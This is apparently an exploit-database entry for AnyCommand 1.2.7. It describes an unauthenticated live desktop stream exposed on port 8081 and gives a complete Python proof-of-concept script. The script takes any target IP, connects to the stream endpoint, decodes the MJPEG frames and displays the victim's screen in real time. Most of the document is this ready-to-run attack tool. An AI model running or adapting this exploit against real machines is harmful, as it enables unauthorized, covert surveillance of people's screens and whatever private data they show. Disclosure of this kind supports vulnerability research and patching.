📄 AnyCommand 1.2.7 Unauthenticated Live Desktop Stream Access

# Exploit Title: AnyCommand 1.2.7 - Unauthenticated Live Desktop Stream
    Access
    # Date: 30/06/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://anycommand.io/
    # Software Link:
    https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download
    # Version: 1.2.7
    # Tested on: Windows 10
    
    '''
    Description:
    AnyCommand 1.2.7 exposes a live MJPEG screen stream at
    http://<target>:8081/stream
    without access control. Unauthenticated attackers can directly access and
    view the victim’s live screen feed without triggering any prompts or
    requiring a valid session.
    
    POC note:
    go to the browser, navigate to http://192.168.8.101:8081/
    the full screen desktop stream will be exposed.
    '''
    
    import argparse
    import requests
    import time
    import re
    import cv2
    import numpy as np
    
    def fetch_screen_stream(host):
        timestamp_ms = int(time.time() * 1000)
        stream_url = f"http://{host}:8081/stream?t={timestamp_ms}"
        headers = {
            "User-Agent": "Mozilla/5.0",
            "Accept": "image/*,*/*;q=0.8",
            "Referer": f"http://{host}:8081/"
        }
    
        try:
            print("[*] Connecting to unauthenticated stream...")
            response = requests.get(stream_url, headers=headers, stream=True,
    timeout=10)
            if "multipart/x-mixed-replace" not in
    response.headers.get("Content-Type", ""):
                print("[-] Stream is not MJPEG. Aborting.")
                return False
    
            print("[+] Stream connected. Rendering frames... Press 'q' to
    quit.")
            boundary = b"--frame"
            buffer = b""
    
            for chunk in response.iter_content(chunk_size=1024):
                buffer += chunk
                while boundary in buffer:
                    part, buffer = buffer.split(boundary, 1)
                    match = re.search(b'\r\n\r\n(.*)', part, re.DOTALL)
                    if match:
                        jpg_data = match.group(1)
                        try:
                            img_array = np.frombuffer(jpg_data, dtype=np.uint8)
                            frame = cv2.imdecode(img_array, cv2.IMREAD_COLOR)
                            if frame is not None:
                                cv2.imshow("Live Desktop View", frame)
                                if cv2.waitKey(1) & 0xFF == ord('q'):
                                    cv2.destroyAllWindows()
                                    return True
                        except:
                            continue
        except KeyboardInterrupt:
            print("\n[!] Interrupted.")
            cv2.destroyAllWindows()
        except Exception as e:
            print(f"[!] Error: {e}")
            return False
        return True
    
    def main():
        parser = argparse.ArgumentParser(description='AnyCommand 1.2.7
    Unauthenticated Live Desktop Stream Access')
        parser.add_argument('--host', required=True, help='Target IP address')
        args = parser.parse_args()
    
        if not fetch_screen_stream(args.host):
            print("[-] Could not connect to screen stream")
        else:
            print("[+] Stream ended or window closed.")
    
    if __name__ == "__main__":
        main()